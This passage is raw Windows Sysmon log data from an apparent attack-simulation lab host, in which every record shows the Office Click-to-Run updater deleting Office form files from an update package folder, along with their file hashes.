Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SMSS.ICOMD5=6B54889F079E1D65157FF079AE837C48,SHA256=9159B6C509A07B120712EB3E6A7BCD9A211E001EF14AE5F09484BD2E35EBB6CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SMSL.ICOMD5=CBA7EBA85435694942147E97B84F7F61,SHA256=386DB83A021088B7C5604FE4B5B12CB39C5518F9ADF03DD8439EA49E29570D21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SMIMES.CFGMD5=A8095F3647524B7D5632760C7FC93BD1,SHA256=0F0660B513D0EC83CED4D5EEBEEE23AE19511B1FA8E6B72376E7C91DA5052631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SMIMEE.CFGMD5=36E93EB0F6CC79BF105C8689D0213888,SHA256=C8DEF9433B0080C2414F74409AC4F823978CC1C6FCCCC2FF26D37762C78D702C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SIGNS.ICOMD5=F0F9B3768B206A70DCDD42A79B602C39,SHA256=5018CA72C293498F53DFB618DF4F5F541F0B4605214E21B519FBB01892A38338,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SIGNL.ICOMD5=AAE6D39F1DB71CDCA4F3739C0AA2D44C,SHA256=553E01FDCE0E724215B09503238EF4A7F9E397206006E1701B88EAF9B28E697E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SIGN.CFGMD5=13BC60E63BE9ADC5632E463C98F19E1A,SHA256=A4CE986137670FD9BD0DE40CE5C5E017BABCD46CB1B1E79CA0049FEF6994A6FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SHARING.CFGMD5=2531A4ABE742415444242A87A6D351C7,SHA256=AF39FDC40C10A0ABB47F6E1D200657CAF346742E1D32F2B3F0A8376679717B9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECURS.ICOMD5=7629C728C7724C55346FEA56E1D5D019,SHA256=1FA844F64A369AB586372B50C24DC3ED8F2375CF5447F258B42F3C34140679AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECURL.ICOMD5=3BEDC926758AF0B96D9E36C393BA5A50,SHA256=83CC332ECAC8AD65DE5C19E85E2B7B6473CB3A09D8452147BE854EC8D0510724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECURE.CFGMD5=DF6581497B7964251199F5128999A3C6,SHA256=9AAEF268215ABE43FABB3C8ADABF077D459E4625584CD932CC60BC3B66BB9492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECRECS.ICOMD5=395E380E346C6F9A5A43BD405A15FD9A,SHA256=3705D7E872086F857CA7453D185B5F6B44AD89722B2A7532B30E17F4097706EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECRECL.ICOMD5=3A6EF5E973F244D098EF5E1158407E96,SHA256=7C94AF8836D5CB1CB00F5E52A8DFA746F0F5B9E570462A6ACD9FE96407C9ADDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SECREC.CFGMD5=1665B127C6E85D0238008412D8A55F9C,SHA256=44DFB59966BDEA7B1DE0BCE69FFB97B5F1023A980493C40E4B82DA2D84A1DFC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCHDREST.CFGMD5=8DC0ACA250829584998D223EDC53F315,SHA256=9E55A166C6A9F6532ECBDF096B7DB98318A4DE548C5FFD42E3D40527CBD5FFB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCHDRESP.CFGMD5=73443F0DC8AF7B6147DE271CAD48AAAC,SHA256=85B95EB6C2124EDC03A521879CB76E6179458A704CF6593C868187F46FF53A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCHDRESN.CFGMD5=404D10A8D4B3EA661F2CEE6F7E3CED27,SHA256=98C37C5C2D21FF2AAFFB4D4F62D6D40C6D5D16269135C94DD2C2042C5827811E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCHDREQ.CFGMD5=2A7CB6A8AF74B5A1DC3CA553B9AD74C8,SHA256=CBEC4DA437B924F14F5CBB6A798103C1F8A6D62E6A418E8326B3D79B87471FB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCHDCNCL.CFGMD5=95EE3DB482C2EEAB461FC20F30C9445B,SHA256=31AE6214D1F35B761F1AC0A3A7E7561BC752F526C53BC21B548F0D734B51C18C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESTS.ICOMD5=3D30970D684D0901AE6D0A1F1E921118,SHA256=041C67033EB2AFDB2CB458DA8146085E24F9E11976732DAB5CA56DD502300671,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESTL.ICOMD5=0E568A6CF958AD094862945759935208,SHA256=EEBBB818C32072703AA1BCD9D7726BEC8A7444428930956B732DF5AA4822A374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESPS.ICOMD5=DF0151D11E3DD0AF25739AE04292F2D3,SHA256=8D7CEF391A60413B8BB170B8292EE2A5C87D402B825E2BF4036F80FF0EE8E76F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESPL.ICOMD5=AABAA3E62558B95B76B1FE3BF53FF22D,SHA256=36C746466FE0858EF52369A54276A10C678BC9837B292516FFB45DCF9D4154AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESNS.ICOMD5=12200A8C20868DD9E11146F3A7BDE5BD,SHA256=303B154FBC90F8FE07AB1B7A28A42A53AFA5E4B140B1EE678ED2A355BA97FECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDRESNL.ICOMD5=BBC2CB8A8395D6AEA03ADA042543B1A0,SHA256=5562E996AAC23CD64243ADE5B9C58D93CB09730361B0E9CC924C8D8FE8C9D77B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDREQS.ICOMD5=8E8397080427E9B389B7009A86B6E6A5,SHA256=703A9D9616F5F2AA423D4970B23E7199177F8AE958362A56821C88FACD94D624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDREQL.ICOMD5=820EC5D04A36F7DC2FCB37B1114E51AE,SHA256=EB89B422356D0E020D5386091025D73BFAFC05F68FEECABB50C2254D211A05B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDCNCLS.ICOMD5=E981227C311A630B33EAFF6ECE2F8565,SHA256=EA0111C2DCCCDE30ABA7901065CD9B032CA4FA39EDD015C8FF97571D0C7291AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\SCDCNCLL.ICOMD5=BB616D347941F08A45DD40171C4D4AD4,SHA256=BB13EB8D85ED3994C9E63524710C8FCA682BFD6ADF9D382E43B94D5E456855AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RSSITEMS.ICOMD5=A3C61BD26F6080A80C2948C13AA7F340,SHA256=892575C459CC8B9324645659A7B27635CDBC99C6C3A2125981A5396255D45160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RSSITEML.ICOMD5=8DAFB32F95139FCFD4849A6A38AE2C1A,SHA256=6565E1EF6F590D8BADE1F7A79DE42772F88C9ECD0A3E221497C51595916ED90C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RSSITEM.CFGMD5=34B2ABBF438E90C790A909CCA798493D,SHA256=9C26865B05737838EC81CE92DDCFDD83782BB30EBB2308BD5284C0D8BFC2BFF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RESENDS.ICOMD5=CEF83806D3846798A0B0846812126982,SHA256=5A93E9C74381289C5118EEDF4FB7839E510ADDD4D2C407D855C425AA28261041,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RESENDL.ICOMD5=14E57A665022CB5A3AF0CBB68512730B,SHA256=F46E890C6337DF4EABF83E11DFE18AAB03CF93F28CD7BA3F85F583700541C8AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RESEND.CFGMD5=C0E3EC05FF9C3E0EAD578543442AA3D4,SHA256=0C6DD6D557D5E8BB6BBFCCE1D8985E43703D4CBBA713CB654B752495A03F10F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REPORTS.ICOMD5=1BCB82A2F645FE73A93BBD7A3983106F,SHA256=AA317A35AB0E4A07DBF18D5AC8DB7ED1A1C7715555B33226A6DCD0BDCEDCDE87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REPORTL.ICOMD5=3A1808F7E98E6A8CE628F43EE6DCF177,SHA256=B73D1673CA00303D2F385A091786C77B3CE93C10BA081D01C61F7B4D9A403F52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REPORT.CFGMD5=0B374F569FAF33F4ADA2828876B6D9B5,SHA256=FF817C7284303C3AD4DBC909ECD7E4A9A329C9C2359729094CA86EEBDC908F9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REPLTMPL.CFGMD5=96A3C116687EEDA6909EF45DF7AE607D,SHA256=436FE594CE94C628CB085E55690BDF5ED429BAD2347E5B9D36250905EC383A8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REMOTES.ICOMD5=F4AE2FB941711286BC99C305B8C7A0FC,SHA256=B44BD10BAC61CF716267239A66DFECC05C725D35E658714861D13C7B714B9B74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REMOTEL.ICOMD5=D6BD6D3CD59699E0A85504DFD1F23ABD,SHA256=331755710F7D78B04C48949B697D8466C4DB298D997F3EA55DA32EEBE1BD5885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REMOTE.CFGMD5=F1DF54E80EBC9B1226A22AD7A4A0B949,SHA256=AF24357686E22F5A18E80DC30C0334F904F286D665A83AF00C2544DCD548A3F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RECS.ICOMD5=275E61FF14B73013F21512FB0B57133F,SHA256=5600659C10F2214AF83B5AC04B1118ADF8A29D48AC2D7272CD228F4673276100,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\RECL.ICOMD5=A835A015008A1B2BF44AFD867FEB758D,SHA256=C7B23721C17CFFB10D5CC9398278CA916F79314B9BBF38DD6470CDDA600BB927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068866Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FORMS\1033\REC.CFGMD5=B77100CB7707F12AEB523FC676372435,SHA256=198689ABB82DEB85DA62C76B82EC032B396A92AF3738316E40702F7851A6A9D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 